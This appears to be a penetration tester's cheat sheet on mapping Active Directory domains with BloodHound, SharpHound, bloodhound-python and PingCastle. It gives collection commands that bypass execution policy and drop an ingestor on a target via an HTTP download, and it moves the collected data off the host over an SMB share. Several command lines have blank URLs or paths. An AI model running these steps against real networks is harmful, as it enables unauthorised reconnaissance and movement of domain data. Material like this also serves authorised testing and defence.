Domain Mapping



# Right Click
# Get information about the node and also how to compromise the user / machine

# Owned
# Can be useful during an internal pentest to keep track of where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones

# Filters
# Can be useful

# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developer Tools
# CTRL+R --> Reload display

# Still possible to edit data to set what you want
# If you don't have access to a domain-joined machine but have credentials,
# you can run the collection from your own host
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/' -JsonFolder 'PATH/TO/folderas above' -CollectionMethod All -Domain  FQDN
# BloodHound directly from the target machine
# apt-get install bloodhound

# Setup
$ sudo neo4j console
... http://localhost:7474
user/pass = neo4j/neo4j  (defaults; Neo4j asks for a new password at first login)

# Start
$ bloodhound
URL : bolt://
Target Collection
# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download

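# PowerShell
# -Exec Bypass only lifts the execution policy for this process; where script block
# logging is enabled (event 4104), the module import is still recorded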
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All

# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs

# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe --CollectionMethod SessionLoop --MaxLoopTime 1h
C:\> SharpHound.exe --CollectionMethod ACL

.\SharpHound.exe --domain UCA.LAN --domaincontroller --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly
# Python based ingestor (for remote work)

# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri “” -OutFile “.\SharpHound.ps1”

Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All

# Since Windows 10, anonymous access to an SMB server is no longer possible, so set a username and password
sudo python SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"

net use Z: \\\SDFR /user:peon peon
net use Z: /delete /y

copy C:\Users\xxx\Documents\ \\\TESTLOL\


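# Results will be zipped
# Retrieve the zip, unzip it and upload the JSON files into BloodHound
# The archive holds the domain's users, groups, sessions and ACLs: handle it as
# sensitive engagement data and remove it from the target once retrieved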
# Custom queries

# Replace or update the following file

# Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.

./ -u neo4j -p BloodHound -d TESTLAB.LOCAL
./ -u neo4j -p hunter2 -d BigTech.corp -a -t 5m -v true


Link:
> Drop exe on the target
> Run Pingcastle.exe (interactive mode by default)
> Healthcheck (Enter) and domain (*)

> CLI mode:
> PingCastle --healthcheck --server
> PingCastle --carto